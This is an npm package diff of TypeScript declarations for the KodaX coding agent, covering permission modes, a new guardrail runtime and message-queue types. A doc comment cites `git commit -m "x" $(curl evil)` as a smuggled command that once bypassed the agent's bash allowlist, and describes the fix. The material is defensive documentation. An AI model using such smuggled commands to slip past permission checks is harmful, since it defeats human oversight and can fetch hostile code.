@kodax-ai/kodax 0.7.50 → 0.7.52

package/dist/types-chunks/{storage.d-J2GqOgaX.d.ts → storage.d-CabW10Nt.d.ts}

@@ -1,4 +1,79 @@
-import { n as KodaXSessionData, s as KodaXSessionLineage, v as KodaXSessionNavigationOptions, w as KodaXSessionRuntimeInfo, y as KodaXSessionStorage } from './types.d-BnjX2Gn4.js';
+import { a as BashPrefixExtractor } from './bash-prefix-extractor.d-DBFZEwop.js';
+import { $ as KodaXSessionData, a4 as KodaXSessionLineage, a7 as KodaXSessionNavigationOptions, a8 as KodaXSessionRuntimeInfo, aa as KodaXSessionStorage } from './process.d-Bj82oJhD.js';
+
+/**
+ * Permission Types
+ */
+
+/**
+ * Permission mode
+ * - plan: Read-only planning, all modifications blocked unless explicitly whitelisted
+ * - accept-edits: File edits auto-approved, shell commands require confirmation
+ * - auto: All tools auto-approved (with optional LLM classifier review when
+ *         auto-mode engine === 'llm'; FEATURE_092 v0.7.33). When engine === 'rules',
+ *         falls back to the legacy "all tools approved within project, outside
+ *         requires confirmation" behavior — i.e., the v0.7.32 `auto-in-project`
+ *         shape. The `auto-in-project` name is preserved as a deprecated alias
+ *         for 5 minor versions (removed in v0.7.38).
+ */
+type PermissionMode = "plan" | "accept-edits" | "auto" | "auto-in-project";
+declare const PERMISSION_MODES: PermissionMode[];
+/**
+ * Status-bar display name for a permission mode. Title-Case short labels
+ * (mirrors Claude Code's `shortTitle` convention in
+ * `src/utils/permissions/PermissionMode.ts`):
+ *   - `plan`             → `Plan`
+ *   - `accept-edits`     → `Edits`
+ *   - `auto`             → `Auto`
+ *   - `auto-in-project`  → `Auto`  (deprecated alias folds into the canonical
+ *                                   display name; the deprecation notice
+ *                                   surfaces once per session at startup)
+ *
+ * Single source of truth — both the readline status-bar
+ * (`packages/repl/src/interactive/status-bar.ts`) and the Ink view-model
+ * (`packages/repl/src/ui/view-models/status-bar.ts`) consume this so the two
+ * surfaces never drift on capitalization or short-form choice.
+ */
+declare function permissionModeDisplayName(mode: PermissionMode): string;
+interface ConfirmResult {
+    confirmed: boolean;
+    always?: boolean;
+}
+interface PermissionContext {
+    permissionMode: PermissionMode;
+    confirmTools: Set<string>;
+    gitRoot?: string;
+    alwaysAllowTools: string[];
+    onConfirm?: (tool: string, input: Record<string, unknown>) => Promise<ConfirmResult>;
+    saveAlwaysAllowTool?: (tool: string, input: Record<string, unknown>, allowAll?: boolean) => void;
+    switchPermissionMode?: (mode: PermissionMode) => void;
+    beforeToolExecute?: (tool: string, input: Record<string, unknown>) => Promise<boolean | string>;
+    /**
+     * FEATURE_153 (v0.7.38) — Optional LLM-backed bash command prefix extractor.
+     * When supplied, `isToolCallAllowed` uses it to extract the SAFE PREFIX of
+     * a bash command before matching against allowlist patterns like
+     * `Bash(git commit:*)`. This eliminates the pre-FEATURE_153 vulnerability
+     * where `git commit -m "x" $(curl evil)` matched the allowlist via naive
+     * `command.startsWith` semantics.
+     *
+     * KodaX REPL bootstrap creates this via `createBashPrefixExtractor` from
+     * `@kodax-ai/coding` and threads it here. SDK consumers / tests without
+     * LLM access can omit it; legacy startsWith semantics apply (documented
+     * as insecure in `matchesBashPatternLegacy`).
+     */
+    bashPrefixExtractor?: BashPrefixExtractor;
+}
+/**
+ * Compute the base confirmation set for each permission mode.
+ *
+ * Note: `plan` still lists the standard mutating tools here even though most of
+ * them are blocked earlier in the permission pipeline via `getPlanModeBlockReason`.
+ * This helper only describes the remaining confirmation step for calls that are
+ * not hard-blocked.
+ */
+declare function computeConfirmTools(mode: PermissionMode): Set<string>;
+declare function isPermissionMode(value: string | undefined): value is PermissionMode;
+declare function normalizePermissionMode(value: string | undefined, fallback?: PermissionMode): PermissionMode | undefined;
 
 /**
  * Session Storage - Session storage abstraction layer
@@ -201,5 +276,5 @@ declare class FileSessionStorage implements KodaXSessionStorage {
     cleanupOldSessions(retentionDays: number): Promise<number>;
 }
 
-export { FileSessionStorage as F, MemorySessionStorage as M, createMemorySessionStorage as c };
-export type { SessionData as S, SessionStorage as a };
+export { FileSessionStorage as F, MemorySessionStorage as M, PERMISSION_MODES as P, computeConfirmTools as d, createMemorySessionStorage as e, isPermissionMode as i, normalizePermissionMode as n, permissionModeDisplayName as p };
+export type { ConfirmResult as C, SessionData as S, PermissionContext as a, PermissionMode as b, SessionStorage as c };

package/dist/types-chunks/types.d-D4jL-gAA.d.ts

@@ -0,0 +1,273 @@
+import { y as Guardrail, aG as RunnerToolCall, d as Agent, f as AgentMessage, aJ as RunnerToolResult, aS as Span } from './process.d-Bj82oJhD.js';
+
+/**
+ * Guardrail Runtime — FEATURE_085 (v0.7.26).
+ *
+ * Three-tier runtime for Agent guardrails:
+ *
+ *   - `InputGuardrail`: runs once before the first LLM turn, inspects the
+ *     full input transcript, may allow / rewrite / block / escalate.
+ *   - `OutputGuardrail`: runs once before returning, inspects the final
+ *     assistant message, may allow / rewrite / block / escalate.
+ *   - `ToolGuardrail`: runs before and/or after each tool invocation,
+ *     inspects the call / result, may allow / rewrite / block / escalate.
+ *
+ * The four verdict actions:
+ *
+ *   - `allow`: continue with the current value.
+ *   - `rewrite`: replace the current value with `payload`.
+ *   - `block`: throw `GuardrailBlockedError` (for input/output) or surface
+ *     an error tool_result (for tool-before); the LLM / caller sees a
+ *     rejection and must adapt.
+ *   - `escalate`: throw `GuardrailEscalateError`; the SDK consumer catches
+ *     and decides whether to prompt the user, retry under different
+ *     constraints, etc.
+ *
+ * Every guardrail invocation emits a `GuardrailSpan` under the agent's
+ * span when tracing is active.
+ *
+ * @experimental API shape may adjust during v0.7.x rollout.
+ */
+
+/**
+ * Shared execution context passed to every guardrail.
+ *
+ * `messages` is the live conversation transcript at the moment this
+ * guardrail fires. For tool-side guardrails this is the transcript at
+ * call-site time — it does NOT yet include the assistant turn that
+ * emitted the current tool_use, since that turn is appended only after
+ * the full tool batch settles. Optional so existing guardrails that
+ * don't read context still type-check; populated by the Runner for all
+ * production hook points.
+ *
+ * Added in FEATURE_092 (v0.7.33) so the auto-mode classifier guardrail
+ * can extract intent context (user prompt + prior tool_use / tool_result
+ * blocks) without reaching into Runner internals.
+ */
+interface GuardrailContext {
+    readonly agent: Agent;
+    readonly abortSignal?: AbortSignal;
+    readonly messages?: readonly AgentMessage[];
+}
+/**
+ * Outcome of a single guardrail check. `payload` shape depends on the hook
+ * point — see the specific guardrail interface for the expected type.
+ */
+type GuardrailVerdict = {
+    readonly action: 'allow';
+} | {
+    readonly action: 'rewrite';
+    readonly payload: unknown;
+    readonly reason?: string;
+} | {
+    readonly action: 'block';
+    readonly reason: string;
+} | {
+    readonly action: 'escalate';
+    readonly reason: string;
+};
+/**
+ * Input-side guardrail. Expected `rewrite` payload shape:
+ * `readonly AgentMessage[]` — the replacement transcript.
+ */
+interface InputGuardrail extends Guardrail {
+    readonly kind: 'input';
+    check(input: readonly AgentMessage[], ctx: GuardrailContext): Promise<GuardrailVerdict>;
+}
+/**
+ * Output-side guardrail. Expected `rewrite` payload shape:
+ * `AgentMessage` — the replacement final assistant message.
+ */
+interface OutputGuardrail extends Guardrail {
+    readonly kind: 'output';
+    check(output: AgentMessage, ctx: GuardrailContext): Promise<GuardrailVerdict>;
+}
+/**
+ * Tool-side guardrail. `beforeTool` rewrite payload shape: `RunnerToolCall`
+ * (replacement call). `afterTool` rewrite payload shape: `RunnerToolResult`
+ * (replacement result). Either hook is optional.
+ */
+interface ToolGuardrail extends Guardrail {
+    readonly kind: 'tool';
+    beforeTool?(call: RunnerToolCall, ctx: GuardrailContext): Promise<GuardrailVerdict>;
+    afterTool?(call: RunnerToolCall, result: RunnerToolResult, ctx: GuardrailContext): Promise<GuardrailVerdict>;
+}
+/**
+ * Thrown when any guardrail returns `{ action: 'block' }`. The Runner
+ * propagates this up to the caller — the run is aborted at that point.
+ */
+declare class GuardrailBlockedError extends Error {
+    readonly guardrailName: string;
+    readonly hookPoint: 'input' | 'output' | 'tool';
+    constructor(guardrailName: string, hookPoint: 'input' | 'output' | 'tool', reason: string);
+}
+/**
+ * Thrown when any guardrail returns `{ action: 'escalate' }`. Callers can
+ * catch and prompt the user or apply a stricter policy before retrying.
+ */
+declare class GuardrailEscalateError extends Error {
+    readonly guardrailName: string;
+    readonly hookPoint: 'input' | 'output' | 'tool';
+    constructor(guardrailName: string, hookPoint: 'input' | 'output' | 'tool', reason: string);
+}
+/** Filter a guardrail list by hook-point. */
+declare function collectGuardrails(guardrails: readonly Guardrail[] | undefined): {
+    input: readonly InputGuardrail[];
+    output: readonly OutputGuardrail[];
+    tool: readonly ToolGuardrail[];
+};
+/**
+ * Run all input guardrails in declaration order. Returns the (possibly
+ * rewritten) transcript. Throws on block / escalate.
+ */
+declare function runInputGuardrails(transcript: readonly AgentMessage[], guardrails: readonly InputGuardrail[], ctx: GuardrailContext, agentSpan: Span | null): Promise<readonly AgentMessage[]>;
+/**
+ * Run all output guardrails in declaration order. Returns the (possibly
+ * rewritten) final assistant message. Throws on block / escalate.
+ */
+declare function runOutputGuardrails(output: AgentMessage, guardrails: readonly OutputGuardrail[], ctx: GuardrailContext, agentSpan: Span | null): Promise<AgentMessage>;
+/**
+ * Outcome of the before-tool guardrail stage.
+ *   - `{ kind: 'allow', call }`: continue to executeRunnerToolCall with `call`
+ *   - `{ kind: 'block', result }`: skip execution; return `result` as the
+ *     tool_result to the LLM (so it sees the rejection and can adapt)
+ */
+type ToolBeforeOutcome = {
+    readonly kind: 'allow';
+    readonly call: RunnerToolCall;
+} | {
+    readonly kind: 'block';
+    readonly result: RunnerToolResult;
+};
+/**
+ * Run before-tool guardrails in declaration order. Rewrite replaces the
+ * tool call. Block surfaces an error tool_result to the LLM instead of
+ * throwing — the LLM sees the rejection and adapts. Escalate still throws.
+ */
+declare function runToolBeforeGuardrails(call: RunnerToolCall, guardrails: readonly ToolGuardrail[], ctx: GuardrailContext, agentSpan: Span | null): Promise<ToolBeforeOutcome>;
+/**
+ * Run after-tool guardrails in declaration order. Rewrite replaces the
+ * result content. Block replaces with an error result. Escalate throws.
+ */
+declare function runToolAfterGuardrails(call: RunnerToolCall, result: RunnerToolResult, guardrails: readonly ToolGuardrail[], ctx: GuardrailContext, agentSpan: Span | null): Promise<RunnerToolResult>;
+
+/**
+ * @kodax-ai/agent/messaging — Message queue types
+ *
+ * FEATURE_115 (v0.7.36): agentId-scoped 2-tier priority queue infrastructure.
+ *
+ * Per ADR-021: messaging is a generic agent-platform primitive (not coding-
+ * specific). Downstream consumers:
+ *   - @kodax-ai/coding runner-driven mid-turn drain
+ *   - @kodax-ai/repl InkREPL ESC soft-pause + text injection (FEATURE_111 absorbed)
+ *   - subagent task-notification routing (FEATURE_155 idle-yield wakeup)
+ *
+ * Phase 0.6 study (`c:/tmp/claude-code-actual-usage.md`): Claude Code's
+ * `'now'` priority has zero production usage; KodaX simplifies to 2 tiers.
+ */
+type MessagePriority = 'user' | 'background';
+type MessageMode = 'prompt' | 'task-notification' | 'system-reminder';
+interface QueuedMessage {
+    /** Stable id for tracing / dedup. Format: `msg-<sequence>`. */
+    readonly id: string;
+    readonly priority: MessagePriority;
+    /**
+     * Routing key:
+     *   undefined = main thread / coordinator agent
+     *   'agent-id-XYZ' = subagent / specific consumer
+     *
+     * Drain consumers MUST filter by agentId match — undefined matches only
+     * undefined-agentId messages, not "any agent".
+     */
+    readonly agentId?: string;
+    readonly mode: MessageMode;
+    readonly content: string;
+    /** Wall-clock timestamp (`Date.now()`) for tracing only — not used for ordering. */
+    readonly enqueuedAt: number;
+}
+interface DequeueFilter {
+    /**
+     * Only return messages with this agentId.
+     * undefined matches messages with no agentId (main-thread messages only).
+     */
+    readonly agentId?: string;
+    /**
+     * Highest priority level included in the drain.
+     *   'user'       → only user priority drained, background stays queued
+     *   'background' → both user + background drained (Sleep-gated case)
+     */
+    readonly maxPriority: MessagePriority;
+    /**
+     * Optional cap on number of messages drained in this call.
+     * Defaults to unlimited (drains all matching).
+     */
+    readonly limit?: number;
+    /**
+     * FEATURE_159 (v0.7.40) — optional mode filter. Lets REPL split the
+     * single queue into mode-typed views (e.g. `mode:'prompt'` for user
+     * input vs `mode:'task-notification'` for child completion banners)
+     * without separate queues. When omitted, all modes match.
+     */
+    readonly mode?: MessageMode;
+    /**
+     * FEATURE_159 (v0.7.40) — optional precise-id filter. Single-message
+     * targeted removal — drives Esc-pop-this-uuid in REPL. When set, all
+     * other filters still apply (agentId / priority / mode mismatches still
+     * skip the message), so callers can't accidentally remove a message
+     * outside their scope.
+     */
+    readonly id?: string;
+    /**
+     * FEATURE_159 (v0.7.40) — optional escape-hatch predicate, AND-ed with
+     * the structured filters. Lets SDK consumers express conditions the
+     * typed fields don't cover (e.g. timestamp ranges, content-match) without
+     * forcing every new use case to extend `DequeueFilter`. KodaX-internal
+     * code should prefer the typed fields for readability; this is the
+     * "data-driven main path + predicate escape" pattern.
+     *
+     * Evaluated AFTER the typed filters succeed — so a `predicate` that
+     * inspects `message.content` never runs on messages outside the
+     * caller's `agentId` / `mode` / `id` scope.
+     */
+    readonly predicate?: (message: QueuedMessage) => boolean;
+}
+/**
+ * FEATURE_159 (v0.7.40) — structured queue event emitted to subscribers.
+ *
+ * Replaces the prior `() => void` bare-notify signal. Carries the kind +
+ * affected messages so SDK observability consumers (logging, tracing,
+ * metrics) can react per-event without re-diffing snapshots.
+ *
+ * Event granularity rules:
+ *   - `enqueued` fires ONCE per `enqueue()` call (always 1 message).
+ *   - `dequeued` fires ONCE per `dequeue()` call that removed ≥1 message,
+ *     carrying ALL drained messages in priority+FIFO order. No-op drains
+ *     (filter matched nothing) fire no event — quiet by design so the
+ *     `waitForWakeEvent` 100ms poll doesn't spam idle subscribers.
+ *   - `cleared` fires ONCE per `clear()` call that removed ≥1 message,
+ *     carrying the pre-clear messages. Empty-queue clear fires nothing.
+ *
+ * The `useSyncExternalStore` React hook ignores the event payload (it
+ * only needs the change signal); SDK / tracer consumers read the event.
+ */
+type QueueEvent = {
+    readonly kind: 'enqueued';
+    readonly message: QueuedMessage;
+} | {
+    readonly kind: 'dequeued';
+    readonly messages: readonly QueuedMessage[];
+} | {
+    readonly kind: 'cleared';
+    readonly messages: readonly QueuedMessage[];
+};
+/** FEATURE_159 — `MessageQueue.subscribe` listener signature. */
+type QueueEventListener = (event: QueueEvent) => void;
+interface EnqueueInput {
+    readonly priority: MessagePriority;
+    readonly mode: MessageMode;
+    readonly content: string;
+    readonly agentId?: string;
+}
+
+export { GuardrailBlockedError as G, GuardrailEscalateError as b, collectGuardrails as g, runOutputGuardrails as h, runToolAfterGuardrails as i, runToolBeforeGuardrails as j, runInputGuardrails as r };
+export type { DequeueFilter as D, EnqueueInput as E, InputGuardrail as I, MessageMode as M, OutputGuardrail as O, QueueEventListener as Q, ToolBeforeOutcome as T, GuardrailContext as a, GuardrailVerdict as c, MessagePriority as d, QueuedMessage as e, ToolGuardrail as f };

package/dist/types-chunks/{utils.d-D_-jrRku.d.ts → utils.d-23Gn14zP.d.ts}

@@ -1,85 +1,11 @@
-import { i as BashPrefixExtractor, a5 as KodaXOptions, N as KodaXContextTokenSnapshot, x as KodaXAgentMode, aa as KodaXRepoIntelligenceMode, A as AgentsFile, f as AutoModeStats, am as KodaXSkillInvocationContext, a2 as KodaXMcpServersConfig } from './bash-prefix-extractor.d-B0CIb0N3.js';
-import { a as SessionStorage$1 } from './storage.d-J2GqOgaX.js';
-import { y as KodaXSessionStorage, n as KodaXSessionData, A as KodaXSessionUiHistoryItem, s as KodaXSessionLineage, k as KodaXSessionArtifactLedgerEntry, w as KodaXSessionRuntimeInfo } from './types.d-BnjX2Gn4.js';
-import { n as KodaXMessage, E as KodaXReasoningMode, r as KodaXProviderCapabilityProfile, F as KodaXReasoningOverride, h as KodaXCustomProviderConfig } from './types.d-rPRl2LSB.js';
-import { bh as WorkflowProcessSource } from './process.d-BbiXD24v.js';
+import { P as KodaXOptions, s as KodaXContextTokenSnapshot, k as KodaXAgentMode, U as KodaXRepoIntelligenceMode, a4 as KodaXSkillInvocationContext } from './bash-prefix-extractor.d-DBFZEwop.js';
+import { c as SessionStorage$1, b as PermissionMode } from './storage.d-CabW10Nt.js';
+import { aa as KodaXSessionStorage, $ as KodaXSessionData, ac as KodaXSessionUiHistoryItem, a4 as KodaXSessionLineage, Y as KodaXSessionArtifactLedgerEntry, a8 as KodaXSessionRuntimeInfo, bD as WorkflowProcessSource } from './process.d-Bj82oJhD.js';
+import { o as KodaXMessage, G as KodaXReasoningMode, t as KodaXProviderCapabilityProfile, H as KodaXReasoningOverride, i as KodaXCustomProviderConfig } from './base.d-BBNUF9nz.js';
+import { A as AgentsFile, f as AutoModeStats, l as KodaXMcpServersConfig } from './guardrail.d-B18oO1gt.js';
 import * as readline from 'readline';
 import { SpawnSyncReturns } from 'child_process';
 
-/**
- * Permission Types
- */
-
-/**
- * Permission mode
- * - plan: Read-only planning, all modifications blocked unless explicitly whitelisted
- * - accept-edits: File edits auto-approved, shell commands require confirmation
- * - auto: All tools auto-approved (with optional LLM classifier review when
- *         auto-mode engine === 'llm'; FEATURE_092 v0.7.33). When engine === 'rules',
- *         falls back to the legacy "all tools approved within project, outside
- *         requires confirmation" behavior — i.e., the v0.7.32 `auto-in-project`
- *         shape. The `auto-in-project` name is preserved as a deprecated alias
- *         for 5 minor versions (removed in v0.7.38).
- */
-type PermissionMode = "plan" | "accept-edits" | "auto" | "auto-in-project";
-declare const PERMISSION_MODES: PermissionMode[];
-/**
- * Status-bar display name for a permission mode. Title-Case short labels
- * (mirrors Claude Code's `shortTitle` convention in
- * `src/utils/permissions/PermissionMode.ts`):
- *   - `plan`             → `Plan`
- *   - `accept-edits`     → `Edits`
- *   - `auto`             → `Auto`
- *   - `auto-in-project`  → `Auto`  (deprecated alias folds into the canonical
- *                                   display name; the deprecation notice
- *                                   surfaces once per session at startup)
- *
- * Single source of truth — both the readline status-bar
- * (`packages/repl/src/interactive/status-bar.ts`) and the Ink view-model
- * (`packages/repl/src/ui/view-models/status-bar.ts`) consume this so the two
- * surfaces never drift on capitalization or short-form choice.
- */
-declare function permissionModeDisplayName(mode: PermissionMode): string;
-interface ConfirmResult {
-    confirmed: boolean;
-    always?: boolean;
-}
-interface PermissionContext {
-    permissionMode: PermissionMode;
-    confirmTools: Set<string>;
-    gitRoot?: string;
-    alwaysAllowTools: string[];
-    onConfirm?: (tool: string, input: Record<string, unknown>) => Promise<ConfirmResult>;
-    saveAlwaysAllowTool?: (tool: string, input: Record<string, unknown>, allowAll?: boolean) => void;
-    switchPermissionMode?: (mode: PermissionMode) => void;
-    beforeToolExecute?: (tool: string, input: Record<string, unknown>) => Promise<boolean | string>;
-    /**
-     * FEATURE_153 (v0.7.38) — Optional LLM-backed bash command prefix extractor.
-     * When supplied, `isToolCallAllowed` uses it to extract the SAFE PREFIX of
-     * a bash command before matching against allowlist patterns like
-     * `Bash(git commit:*)`. This eliminates the pre-FEATURE_153 vulnerability
-     * where `git commit -m "x" $(curl evil)` matched the allowlist via naive
-     * `command.startsWith` semantics.
-     *
-     * KodaX REPL bootstrap creates this via `createBashPrefixExtractor` from
-     * `@kodax-ai/coding` and threads it here. SDK consumers / tests without
-     * LLM access can omit it; legacy startsWith semantics apply (documented
-     * as insecure in `matchesBashPatternLegacy`).
-     */
-    bashPrefixExtractor?: BashPrefixExtractor;
-}
-/**
- * Compute the base confirmation set for each permission mode.
- *
- * Note: `plan` still lists the standard mutating tools here even though most of
- * them are blocked earlier in the permission pipeline via `getPlanModeBlockReason`.
- * This helper only describes the remaining confirmation step for calls that are
- * not hard-blocked.
- */
-declare function computeConfirmTools(mode: PermissionMode): Set<string>;
-declare function isPermissionMode(value: string | undefined): value is PermissionMode;
-declare function normalizePermissionMode(value: string | undefined, fallback?: PermissionMode): PermissionMode | undefined;
-
 /**
  * InkREPL - Ink-based REPL Adapter
  *
@@ -568,5 +494,5 @@ declare function saveConfig(config: {
 declare function getGitRoot(cwd?: string): Promise<string | null>;
 declare function rateLimitedCall<T>(fn: () => Promise<T>): Promise<T>;
 
-export { processSpecialSyntax as A, BUILTIN_COMMANDS as B, rateLimitedCall as D, registerConfiguredCustomProviders as E, runInkInteractiveMode as F, runInteractiveMode as G, saveConfig as H, touchContext as J, KODAX_CONFIG_FILE as K, PERMISSION_MODES as P, KODAX_DIR as f, KODAX_SESSIONS_DIR as g, KODAX_VERSION as h, PREVIEW_MAX_LENGTH as i, computeConfirmTools as l, createInteractiveContext as m, executeCommand as n, getGitRoot as o, getProviderList as p, getProviderModel as q, getVersion as r, hydrateProcessEnvFromShell as s, isPermissionMode as t, isProviderConfigured as u, loadConfig as v, normalizePermissionMode as w, parseCommand as x, permissionModeDisplayName as y, prepareRuntimeConfig as z };
-export type { Command as C, InkREPLOptions as I, RepLOptions as R, CommandCallbacks as a, ConfirmResult as b, CurrentConfig as c, InteractiveContext as d, InteractiveMode as e, PermissionContext as j, PermissionMode as k };
+export { BUILTIN_COMMANDS as B, KODAX_CONFIG_FILE as K, PREVIEW_MAX_LENGTH as P, KODAX_DIR as e, KODAX_SESSIONS_DIR as f, KODAX_VERSION as g, createInteractiveContext as h, executeCommand as i, getGitRoot as j, getProviderList as k, getProviderModel as l, getVersion as m, hydrateProcessEnvFromShell as n, isProviderConfigured as o, loadConfig as p, parseCommand as q, prepareRuntimeConfig as r, processSpecialSyntax as s, rateLimitedCall as t, registerConfiguredCustomProviders as u, runInkInteractiveMode as v, runInteractiveMode as w, saveConfig as x, touchContext as y };
+export type { Command as C, InkREPLOptions as I, RepLOptions as R, CommandCallbacks as a, CurrentConfig as b, InteractiveContext as c, InteractiveMode as d };

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@kodax-ai/kodax",
-  "version": "0.7.50",
+  "version": "0.7.52",
   "description": "极致轻量化 Coding Agent - TypeScript 实现，支持 12 个 LLM 提供商，可发布为免 Node 单文件二进制",
   "type": "module",
   "private": false,
@@ -87,7 +87,7 @@
   "dependencies": {
     "@agentclientprotocol/sdk": "^0.15.0",
     "@alcalzone/ansi-tokenize": "^0.2.5",
-    "@anthropic-ai/sdk": "^0.80.0",
+    "@anthropic-ai/sdk": "^0.104.2",
     "ansi-escapes": "^7.3.0",
     "auto-bind": "^5.0.1",
     "chalk": "^5.4.1",
@@ -141,7 +141,7 @@
     "vitest": "^3.2.4"
   },
   "engines": {
-    "node": ">=18.0.0"
+    "node": ">=20.0.0"
   },
   "repository": {
     "type": "git",

package/dist/chunks/argument-completer-3WX5B42G.js

@@ -1,2 +0,0 @@
-// @kodax-ai/kodax — bundled distribution. See docs/ADR.md ADR-022 + ADR-024.
-import{ia as a,ja as b}from"./chunk-UB5IAZHF.js";import"./chunk-HR64F32V.js";import"./chunk-SK4HOYT2.js";import"./chunk-MFOMFMSK.js";import"./chunk-XZY4CIDV.js";import"./chunk-5UJQ2GKJ.js";import"./chunk-V4WSBIXB.js";export{a as ArgumentCompleter,b as createArgumentCompleter};